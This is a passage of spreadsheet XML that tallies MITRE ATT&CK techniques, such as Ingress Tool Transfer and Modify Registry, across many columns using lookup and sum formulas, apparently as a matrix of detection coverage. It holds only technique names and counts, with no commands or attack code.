        <v>1</v>
      </c>
      <c r="BS22" s="12">
        <v>5</v>
      </c>
      <c r="BT22" s="13">
        <v>1</v>
      </c>
      <c r="BU22" s="394">
        <v>20</v>
      </c>
      <c r="BV22" s="292">
        <v>6</v>
      </c>
      <c r="BW22" s="322">
        <v>4</v>
      </c>
      <c r="BX22" s="322" t="str">
        <f t="shared" si="11"/>
        <v>4 (6)</v>
      </c>
      <c r="BY22" s="12">
        <v>1</v>
      </c>
      <c r="BZ22" s="13">
        <v>1</v>
      </c>
      <c r="CA22" s="394">
        <v>4</v>
      </c>
      <c r="CB22" s="292">
        <v>47</v>
      </c>
      <c r="CC22" s="322">
        <v>15</v>
      </c>
      <c r="CD22" s="322" t="str">
        <f t="shared" si="12"/>
        <v>15 (47)</v>
      </c>
      <c r="CE22" s="12">
        <v>0</v>
      </c>
      <c r="CF22" s="12">
        <v>1</v>
      </c>
      <c r="CG22" s="13">
        <v>1</v>
      </c>
      <c r="CH22" s="394">
        <v>15</v>
      </c>
    </row>
    <row r="23" spans="1:86" ht="15" customHeight="1">
      <c r="A23" s="4">
        <f t="shared" si="13"/>
        <v>21</v>
      </c>
      <c r="B23" s="4" t="str">
        <f>IFERROR(VLOOKUP(A23,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1095</v>
      </c>
      <c r="C23" s="493" t="str">
        <f>IFERROR(VLOOKUP(B23,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="D23" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B23)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E23" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F23" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G23" s="292">
        <v>2</v>
      </c>
      <c r="H23" s="322">
        <v>1</v>
      </c>
      <c r="I23" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (2)</v>
      </c>
      <c r="J23" s="12">
        <v>1</v>
      </c>
      <c r="K23" s="13">
        <v>1</v>
      </c>
      <c r="L23" s="394">
        <v>1</v>
      </c>
      <c r="M23" s="322">
        <v>3</v>
      </c>
      <c r="N23" s="322">
        <v>3</v>
      </c>
      <c r="O23" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="P23" s="12">
        <v>3</v>
      </c>
      <c r="Q23" s="13">
        <v>1</v>
      </c>
      <c r="R23" s="394">
        <v>1</v>
      </c>
      <c r="S23" s="292">
        <v>5</v>
      </c>
      <c r="T23" s="322">
        <v>4</v>
      </c>
      <c r="U23" s="322" t="str">
        <f t="shared" si="2"/>
        <v>4 (5)</v>
      </c>
      <c r="V23" s="12">
        <v>4</v>
      </c>
      <c r="W23" s="13">
        <v>1</v>
      </c>
      <c r="X23" s="394">
        <v>2</v>
      </c>
      <c r="Y23" s="392">
        <v>16</v>
      </c>
      <c r="Z23" s="392">
        <v>6</v>
      </c>
      <c r="AA23" s="322" t="str">
        <f t="shared" si="3"/>
        <v>6 (16)</v>
      </c>
      <c r="AB23" s="392">
        <v>6</v>
      </c>
      <c r="AC23" s="16">
        <v>1</v>
      </c>
      <c r="AD23" s="394">
        <v>2</v>
      </c>
      <c r="AE23" s="392">
        <v>11</v>
      </c>
      <c r="AF23" s="392">
        <v>8</v>
      </c>
      <c r="AG23" s="322" t="str">
        <f t="shared" si="4"/>
        <v>8 (11)</v>
      </c>
      <c r="AH23" s="392">
        <v>8</v>
      </c>
      <c r="AI23" s="16">
        <v>1</v>
      </c>
      <c r="AJ23" s="394">
        <v>1</v>
      </c>
      <c r="AK23" s="392">
        <v>27</v>
      </c>
      <c r="AL23" s="392">
        <v>14</v>
      </c>
      <c r="AM23" s="322" t="str">
        <f t="shared" si="5"/>
        <v>14 (27)</v>
      </c>
      <c r="AN23" s="392">
        <v>14</v>
      </c>
      <c r="AO23" s="16">
        <v>1</v>
      </c>
      <c r="AP23" s="394">
        <v>2</v>
      </c>
      <c r="AQ23" s="292">
        <v>0</v>
      </c>
      <c r="AR23" s="322">
        <v>0</v>
      </c>
      <c r="AS23" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT23" s="12">
        <v>0</v>
      </c>
      <c r="AU23" s="13">
        <v>0</v>
      </c>
      <c r="AV23" s="394">
        <v>0</v>
      </c>
      <c r="AW23" s="392">
        <v>3</v>
      </c>
      <c r="AX23" s="392">
        <v>2</v>
      </c>
      <c r="AY23" s="322" t="str">
        <f t="shared" si="7"/>
        <v>2 (3)</v>
      </c>
      <c r="AZ23" s="4">
        <v>2</v>
      </c>
      <c r="BA23" s="16">
        <v>1</v>
      </c>
      <c r="BB23" s="394">
        <v>1</v>
      </c>
      <c r="BC23" s="292">
        <v>8</v>
      </c>
      <c r="BD23" s="322">
        <v>6</v>
      </c>
      <c r="BE23" s="322" t="str">
        <f t="shared" si="8"/>
        <v>6 (8)</v>
      </c>
      <c r="BF23" s="12">
        <v>6</v>
      </c>
      <c r="BG23" s="13">
        <v>1</v>
      </c>
      <c r="BH23" s="394">
        <v>2</v>
      </c>
      <c r="BI23" s="292">
        <v>3</v>
      </c>
      <c r="BJ23" s="322">
        <v>2</v>
      </c>
      <c r="BK23" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL23" s="12">
        <v>1</v>
      </c>
      <c r="BM23" s="13">
        <v>1</v>
      </c>
      <c r="BN23" s="394">
        <v>2</v>
      </c>
      <c r="BO23" s="292">
        <v>4</v>
      </c>
      <c r="BP23" s="322">
        <v>3</v>
      </c>
      <c r="BQ23" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (4)</v>
      </c>
      <c r="BR23" s="12">
        <v>1</v>
      </c>
      <c r="BS23" s="12">
        <v>1</v>
      </c>
      <c r="BT23" s="13">
        <v>1</v>
      </c>
      <c r="BU23" s="394">
        <v>2</v>
      </c>
      <c r="BV23" s="292">
        <v>2</v>
      </c>
      <c r="BW23" s="322">
        <v>2</v>
      </c>
      <c r="BX23" s="322" t="str">
        <f t="shared" si="11"/>
        <v>2 (2)</v>
      </c>
      <c r="BY23" s="12">
        <v>1</v>
      </c>
      <c r="BZ23" s="13">
        <v>1</v>
      </c>
      <c r="CA23" s="394">
        <v>2</v>
      </c>
      <c r="CB23" s="292">
        <v>1</v>
      </c>
      <c r="CC23" s="322">
        <v>1</v>
      </c>
      <c r="CD23" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE23" s="12">
        <v>0</v>
      </c>
      <c r="CF23" s="12">
        <v>1</v>
      </c>
      <c r="CG23" s="13">
        <v>1</v>
      </c>
      <c r="CH23" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:86" ht="15" customHeight="1">
      <c r="A24" s="4">
        <f t="shared" si="13"/>
        <v>22</v>
      </c>
      <c r="B24" s="4" t="str">
        <f>IFERROR(VLOOKUP(A24,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1102</v>
      </c>
      <c r="C24" s="493" t="str">
        <f>IFERROR(VLOOKUP(B24,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Web Service</v>
      </c>
      <c r="D24" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B24)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E24" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F24" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G24" s="292">
        <v>0</v>
      </c>
      <c r="H24" s="322">
        <v>0</v>
      </c>
      <c r="I24" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J24" s="12">
        <v>0</v>
      </c>
      <c r="K24" s="13">
        <v>0</v>
      </c>
      <c r="L24" s="394">
        <v>0</v>
      </c>
      <c r="M24" s="322">
        <v>3</v>
      </c>
      <c r="N24" s="322">
        <v>3</v>
      </c>
      <c r="O24" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="P24" s="12">
        <v>3</v>
      </c>
      <c r="Q24" s="13">
        <v>1</v>
      </c>
      <c r="R24" s="394">
        <v>1</v>
      </c>
      <c r="S24" s="292">
        <v>3</v>
      </c>
      <c r="T24" s="322">
        <v>3</v>
      </c>
      <c r="U24" s="322" t="str">
        <f t="shared" si="2"/>
        <v>3 (3)</v>
      </c>
      <c r="V24" s="12">
        <v>3</v>
      </c>
      <c r="W24" s="13">
        <v>1</v>
      </c>
      <c r="X24" s="394">
        <v>1</v>
      </c>
      <c r="Y24" s="392">
        <v>14</v>
      </c>
      <c r="Z24" s="392">
        <v>1</v>
      </c>
      <c r="AA24" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (14)</v>
      </c>
      <c r="AB24" s="392">
        <v>1</v>
      </c>
      <c r="AC24" s="16">
        <v>1</v>
      </c>
      <c r="AD24" s="394">
        <v>1</v>
      </c>
      <c r="AE24" s="392">
        <v>8</v>
      </c>
      <c r="AF24" s="392">
        <v>6</v>
      </c>
      <c r="AG24" s="322" t="str">
        <f t="shared" si="4"/>
        <v>6 (8)</v>
      </c>
      <c r="AH24" s="392">
        <v>5</v>
      </c>
      <c r="AI24" s="16">
        <v>1</v>
      </c>
      <c r="AJ24" s="394">
        <v>2</v>
      </c>
      <c r="AK24" s="392">
        <v>22</v>
      </c>
      <c r="AL24" s="392">
        <v>7</v>
      </c>
      <c r="AM24" s="322" t="str">
        <f t="shared" si="5"/>
        <v>7 (22)</v>
      </c>
      <c r="AN24" s="392">
        <v>6</v>
      </c>
      <c r="AO24" s="16">
        <v>1</v>
      </c>
      <c r="AP24" s="394">
        <v>2</v>
      </c>
      <c r="AQ24" s="292">
        <v>0</v>
      </c>
      <c r="AR24" s="322">
        <v>0</v>
      </c>
      <c r="AS24" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT24" s="12">
        <v>0</v>
      </c>
      <c r="AU24" s="13">
        <v>0</v>
      </c>
      <c r="AV24" s="394">
        <v>0</v>
      </c>
      <c r="AW24" s="392">
        <v>0</v>
      </c>
      <c r="AX24" s="392">
        <v>0</v>
      </c>
      <c r="AY24" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ24" s="4">
        <v>0</v>
      </c>
      <c r="BA24" s="16">
        <v>0</v>
      </c>
      <c r="BB24" s="394">
        <v>0</v>
      </c>
      <c r="BC24" s="292">
        <v>3</v>
      </c>
      <c r="BD24" s="322">
        <v>3</v>
      </c>
      <c r="BE24" s="322" t="str">
        <f t="shared" si="8"/>
        <v>3 (3)</v>
      </c>
      <c r="BF24" s="12">
        <v>3</v>
      </c>
      <c r="BG24" s="13">
        <v>1</v>
      </c>
      <c r="BH24" s="394">
        <v>1</v>
      </c>
      <c r="BI24" s="292">
        <v>2</v>
      </c>
      <c r="BJ24" s="322">
        <v>1</v>
      </c>
      <c r="BK24" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (2)</v>
      </c>
      <c r="BL24" s="12">
        <v>1</v>
      </c>
      <c r="BM24" s="13">
        <v>1</v>
      </c>
      <c r="BN24" s="394">
        <v>1</v>
      </c>
      <c r="BO24" s="292">
        <v>4</v>
      </c>
      <c r="BP24" s="322">
        <v>3</v>
      </c>
      <c r="BQ24" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (4)</v>
      </c>
      <c r="BR24" s="12">
        <v>1</v>
      </c>
      <c r="BS24" s="12">
        <v>2</v>
      </c>
      <c r="BT24" s="13">
        <v>1</v>
      </c>
      <c r="BU24" s="394">
        <v>2</v>
      </c>
      <c r="BV24" s="292">
        <v>1</v>
      </c>
      <c r="BW24" s="322">
        <v>1</v>
      </c>
      <c r="BX24" s="322" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY24" s="12">
        <v>1</v>
      </c>
      <c r="BZ24" s="13">
        <v>1</v>
      </c>
      <c r="CA24" s="394">
        <v>1</v>
      </c>
      <c r="CB24" s="292">
        <v>5</v>
      </c>
      <c r="CC24" s="322">
        <v>1</v>
      </c>
      <c r="CD24" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (5)</v>
      </c>
      <c r="CE24" s="12">
        <v>0</v>
      </c>
      <c r="CF24" s="12">
        <v>1</v>
      </c>
      <c r="CG24" s="13">
        <v>1</v>
      </c>
      <c r="CH24" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:86" ht="15" customHeight="1">
      <c r="A25" s="4">
        <f t="shared" si="13"/>
        <v>23</v>
      </c>
      <c r="B25" s="4" t="str">
        <f>IFERROR(VLOOKUP(A25,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1104</v>
      </c>
      <c r="C25" s="493" t="str">
        <f>IFERROR(VLOOKUP(B25,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Multi-Stage Channels</v>
      </c>
      <c r="D25" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B25)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E25" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F25" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G25" s="292">
        <v>0</v>
      </c>
      <c r="H25" s="322">
        <v>0</v>
      </c>
      <c r="I25" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J25" s="12">
        <v>0</v>
      </c>
      <c r="K25" s="13">
        <v>0</v>
      </c>
      <c r="L25" s="394">
        <v>0</v>
      </c>
      <c r="M25" s="322">
        <v>3</v>
      </c>
      <c r="N25" s="322">
        <v>3</v>
      </c>
      <c r="O25" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="P25" s="12">
        <v>3</v>
      </c>
      <c r="Q25" s="13">
        <v>1</v>
      </c>
      <c r="R25" s="394">
        <v>1</v>
      </c>
      <c r="S25" s="292">
        <v>3</v>
      </c>
      <c r="T25" s="322">
        <v>3</v>
      </c>
      <c r="U25" s="322" t="str">
        <f t="shared" si="2"/>
        <v>3 (3)</v>
      </c>
      <c r="V25" s="12">
        <v>3</v>
      </c>
      <c r="W25" s="13">
        <v>1</v>
      </c>
      <c r="X25" s="394">
        <v>1</v>
      </c>
      <c r="Y25" s="392">
        <v>19</v>
      </c>
      <c r="Z25" s="392">
        <v>1</v>
      </c>
      <c r="AA25" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (19)</v>
      </c>
      <c r="AB25" s="392">
        <v>1</v>
      </c>
      <c r="AC25" s="16">
        <v>1</v>
      </c>
      <c r="AD25" s="394">
        <v>1</v>
      </c>
      <c r="AE25" s="392">
        <v>7</v>
      </c>
      <c r="AF25" s="392">
        <v>5</v>
      </c>
      <c r="AG25" s="322" t="str">
        <f t="shared" si="4"/>
        <v>5 (7)</v>
      </c>
      <c r="AH25" s="392">
        <v>5</v>
      </c>
      <c r="AI25" s="16">
        <v>1</v>
      </c>
      <c r="AJ25" s="394">
        <v>1</v>
      </c>
      <c r="AK25" s="392">
        <v>26</v>
      </c>
      <c r="AL25" s="392">
        <v>6</v>
      </c>
      <c r="AM25" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (26)</v>
      </c>
      <c r="AN25" s="392">
        <v>6</v>
      </c>
      <c r="AO25" s="16">
        <v>1</v>
      </c>
      <c r="AP25" s="394">
        <v>1</v>
      </c>
      <c r="AQ25" s="292">
        <v>0</v>
      </c>
      <c r="AR25" s="322">
        <v>0</v>
      </c>
      <c r="AS25" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT25" s="12">
        <v>0</v>
      </c>
      <c r="AU25" s="13">
        <v>0</v>
      </c>
      <c r="AV25" s="394">
        <v>0</v>
      </c>
      <c r="AW25" s="392">
        <v>0</v>
      </c>
      <c r="AX25" s="392">
        <v>0</v>
      </c>
      <c r="AY25" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ25" s="4">
        <v>0</v>
      </c>
      <c r="BA25" s="16">
        <v>0</v>
      </c>
      <c r="BB25" s="394">
        <v>0</v>
      </c>
      <c r="BC25" s="292">
        <v>3</v>
      </c>
      <c r="BD25" s="322">
        <v>3</v>
      </c>
      <c r="BE25" s="322" t="str">
        <f t="shared" si="8"/>
        <v>3 (3)</v>
      </c>
      <c r="BF25" s="12">
        <v>3</v>
      </c>
      <c r="BG25" s="13">
        <v>1</v>
      </c>
      <c r="BH25" s="394">
        <v>1</v>
      </c>
      <c r="BI25" s="292">
        <v>2</v>
      </c>
      <c r="BJ25" s="322">
        <v>1</v>
      </c>
      <c r="BK25" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (2)</v>
      </c>
      <c r="BL25" s="12">
        <v>1</v>
      </c>
      <c r="BM25" s="13">
        <v>1</v>
      </c>
      <c r="BN25" s="394">
        <v>1</v>
      </c>
      <c r="BO25" s="292">
        <v>3</v>
      </c>
      <c r="BP25" s="322">
        <v>2</v>
      </c>
      <c r="BQ25" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (3)</v>
      </c>
      <c r="BR25" s="12">
        <v>1</v>
      </c>
      <c r="BS25" s="12">
        <v>1</v>
      </c>
      <c r="BT25" s="13">
        <v>1</v>
      </c>
      <c r="BU25" s="394">
        <v>1</v>
      </c>
      <c r="BV25" s="292">
        <v>1</v>
      </c>
      <c r="BW25" s="322">
        <v>1</v>
      </c>
      <c r="BX25" s="322" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY25" s="12">
        <v>1</v>
      </c>
      <c r="BZ25" s="13">
        <v>1</v>
      </c>
      <c r="CA25" s="394">
        <v>1</v>
      </c>
      <c r="CB25" s="292">
        <v>5</v>
      </c>
      <c r="CC25" s="322">
        <v>1</v>
      </c>
      <c r="CD25" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (5)</v>
      </c>
      <c r="CE25" s="12">
        <v>0</v>
      </c>
      <c r="CF25" s="12">
        <v>1</v>
      </c>
      <c r="CG25" s="13">
        <v>1</v>
      </c>
      <c r="CH25" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:86" ht="15" customHeight="1">
      <c r="A26" s="4">
        <f t="shared" si="13"/>
        <v>24</v>
      </c>
      <c r="B26" s="4" t="str">
        <f>IFERROR(VLOOKUP(A26,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1105</v>
      </c>
      <c r="C26" s="493" t="str">
        <f>IFERROR(VLOOKUP(B26,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Ingress Tool Transfer</v>
      </c>
      <c r="D26" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B26)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E26" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F26" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (7)</v>
      </c>
      <c r="G26" s="292">
        <v>5</v>
      </c>
      <c r="H26" s="322">
        <v>2</v>
      </c>
      <c r="I26" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (5)</v>
      </c>
      <c r="J26" s="12">
        <v>1</v>
      </c>
      <c r="K26" s="13">
        <v>1</v>
      </c>
      <c r="L26" s="394">
        <v>2</v>
      </c>
      <c r="M26" s="322">
        <v>3</v>
      </c>
      <c r="N26" s="322">
        <v>3</v>
      </c>
      <c r="O26" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="P26" s="12">
        <v>1</v>
      </c>
      <c r="Q26" s="13">
        <v>1</v>
      </c>
      <c r="R26" s="394">
        <v>3</v>
      </c>
      <c r="S26" s="292">
        <v>8</v>
      </c>
      <c r="T26" s="322">
        <v>5</v>
      </c>
      <c r="U26" s="322" t="str">
        <f t="shared" si="2"/>
        <v>5 (8)</v>
      </c>
      <c r="V26" s="12">
        <v>2</v>
      </c>
      <c r="W26" s="13">
        <v>1</v>
      </c>
      <c r="X26" s="394">
        <v>4</v>
      </c>
      <c r="Y26" s="392">
        <v>5</v>
      </c>
      <c r="Z26" s="392">
        <v>2</v>
      </c>
      <c r="AA26" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (5)</v>
      </c>
      <c r="AB26" s="392">
        <v>1</v>
      </c>
      <c r="AC26" s="16">
        <v>1</v>
      </c>
      <c r="AD26" s="394">
        <v>2</v>
      </c>
      <c r="AE26" s="392">
        <v>8</v>
      </c>
      <c r="AF26" s="392">
        <v>6</v>
      </c>
      <c r="AG26" s="322" t="str">
        <f t="shared" si="4"/>
        <v>6 (8)</v>
      </c>
      <c r="AH26" s="392">
        <v>4</v>
      </c>
      <c r="AI26" s="16">
        <v>1</v>
      </c>
      <c r="AJ26" s="394">
        <v>5</v>
      </c>
      <c r="AK26" s="392">
        <v>13</v>
      </c>
      <c r="AL26" s="392">
        <v>8</v>
      </c>
      <c r="AM26" s="322" t="str">
        <f t="shared" si="5"/>
        <v>8 (13)</v>
      </c>
      <c r="AN26" s="392">
        <v>5</v>
      </c>
      <c r="AO26" s="16">
        <v>1</v>
      </c>
      <c r="AP26" s="394">
        <v>5</v>
      </c>
      <c r="AQ26" s="292">
        <v>0</v>
      </c>
      <c r="AR26" s="322">
        <v>0</v>
      </c>
      <c r="AS26" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT26" s="12">
        <v>0</v>
      </c>
      <c r="AU26" s="13">
        <v>0</v>
      </c>
      <c r="AV26" s="394">
        <v>0</v>
      </c>
      <c r="AW26" s="392">
        <v>0</v>
      </c>
      <c r="AX26" s="392">
        <v>0</v>
      </c>
      <c r="AY26" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ26" s="4">
        <v>0</v>
      </c>
      <c r="BA26" s="16">
        <v>0</v>
      </c>
      <c r="BB26" s="394">
        <v>0</v>
      </c>
      <c r="BC26" s="292">
        <v>8</v>
      </c>
      <c r="BD26" s="322">
        <v>5</v>
      </c>
      <c r="BE26" s="322" t="str">
        <f t="shared" si="8"/>
        <v>5 (8)</v>
      </c>
      <c r="BF26" s="12">
        <v>2</v>
      </c>
      <c r="BG26" s="13">
        <v>1</v>
      </c>
      <c r="BH26" s="394">
        <v>4</v>
      </c>
      <c r="BI26" s="292">
        <v>1</v>
      </c>
      <c r="BJ26" s="322">
        <v>1</v>
      </c>
      <c r="BK26" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL26" s="12">
        <v>1</v>
      </c>
      <c r="BM26" s="13">
        <v>1</v>
      </c>
      <c r="BN26" s="394">
        <v>1</v>
      </c>
      <c r="BO26" s="292">
        <v>6</v>
      </c>
      <c r="BP26" s="322">
        <v>2</v>
      </c>
      <c r="BQ26" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (6)</v>
      </c>
      <c r="BR26" s="12">
        <v>1</v>
      </c>
      <c r="BS26" s="12">
        <v>1</v>
      </c>
      <c r="BT26" s="13">
        <v>1</v>
      </c>
      <c r="BU26" s="394">
        <v>2</v>
      </c>
      <c r="BV26" s="292">
        <v>2</v>
      </c>
      <c r="BW26" s="322">
        <v>2</v>
      </c>
      <c r="BX26" s="322" t="str">
        <f t="shared" si="11"/>
        <v>2 (2)</v>
      </c>
      <c r="BY26" s="12">
        <v>1</v>
      </c>
      <c r="BZ26" s="13">
        <v>1</v>
      </c>
      <c r="CA26" s="394">
        <v>2</v>
      </c>
      <c r="CB26" s="292">
        <v>2</v>
      </c>
      <c r="CC26" s="322">
        <v>2</v>
      </c>
      <c r="CD26" s="322" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE26" s="12">
        <v>0</v>
      </c>
      <c r="CF26" s="12">
        <v>1</v>
      </c>
      <c r="CG26" s="13">
        <v>1</v>
      </c>
      <c r="CH26" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="27" spans="1:86" ht="15" customHeight="1">
      <c r="A27" s="4">
        <f t="shared" si="13"/>
        <v>25</v>
      </c>
      <c r="B27" s="4" t="str">
        <f>IFERROR(VLOOKUP(A27,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1112</v>
      </c>
      <c r="C27" s="493" t="str">
        <f>IFERROR(VLOOKUP(B27,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Modify Registry</v>
      </c>
      <c r="D27" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B27)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E27" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>15</v>
      </c>
      <c r="F27" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (15)</v>
      </c>
      <c r="G27" s="292">
        <v>1</v>
      </c>
      <c r="H27" s="322">
        <v>1</v>
      </c>
      <c r="I27" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J27" s="12">
        <v>1</v>
      </c>
      <c r="K27" s="13">
        <v>1</v>
      </c>
      <c r="L27" s="394">
        <v>1</v>
      </c>
      <c r="M27" s="322">
        <v>0</v>
      </c>
      <c r="N27" s="322">
        <v>0</v>
      </c>
      <c r="O27" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P27" s="12">
        <v>0</v>
      </c>
      <c r="Q27" s="13">
        <v>0</v>
      </c>
      <c r="R27" s="394">
        <v>0</v>
      </c>
      <c r="S27" s="292">
        <v>1</v>
      </c>
      <c r="T27" s="322">
        <v>1</v>
      </c>
      <c r="U27" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V27" s="12">
        <v>1</v>
      </c>
      <c r="W27" s="13">
        <v>1</v>
      </c>
      <c r="X27" s="394">
        <v>1</v>
      </c>
      <c r="Y27" s="392">
        <v>2</v>
      </c>
      <c r="Z27" s="392">
        <v>2</v>
      </c>
      <c r="AA27" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (2)</v>
      </c>
      <c r="AB27" s="392">
        <v>2</v>
      </c>
      <c r="AC27" s="16">
        <v>1</v>
      </c>
      <c r="AD27" s="394">
        <v>1</v>
      </c>
      <c r="AE27" s="392">
        <v>4</v>
      </c>
      <c r="AF27" s="392">
        <v>4</v>
      </c>
      <c r="AG27" s="322" t="str">
        <f t="shared" si="4"/>
        <v>4 (4)</v>
      </c>
      <c r="AH27" s="392">
        <v>2</v>
      </c>
      <c r="AI27" s="16">
        <v>1</v>
      </c>
      <c r="AJ27" s="394">
        <v>2</v>
      </c>
      <c r="AK27" s="392">
        <v>6</v>
      </c>
      <c r="AL27" s="392">
        <v>6</v>
      </c>
      <c r="AM27" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (6)</v>
      </c>
      <c r="AN27" s="392">
        <v>4</v>
      </c>
      <c r="AO27" s="16">
        <v>1</v>
      </c>
      <c r="AP27" s="394">
        <v>3</v>
      </c>
      <c r="AQ27" s="292">
        <v>0</v>
      </c>
      <c r="AR27" s="322">
        <v>0</v>
      </c>
      <c r="AS27" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT27" s="12">
        <v>0</v>
      </c>
      <c r="AU27" s="13">
        <v>0</v>
      </c>
      <c r="AV27" s="394">
        <v>0</v>
      </c>
      <c r="AW27" s="392">
        <v>0</v>
      </c>
      <c r="AX27" s="392">
        <v>0</v>
      </c>
      <c r="AY27" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ27" s="4">
        <v>0</v>
      </c>
      <c r="BA27" s="16">
        <v>0</v>
      </c>
      <c r="BB27" s="394">
        <v>0</v>
      </c>
      <c r="BC27" s="292">
        <v>1</v>
      </c>
      <c r="BD27" s="322">
        <v>1</v>
      </c>
      <c r="BE27" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (1)</v>
      </c>
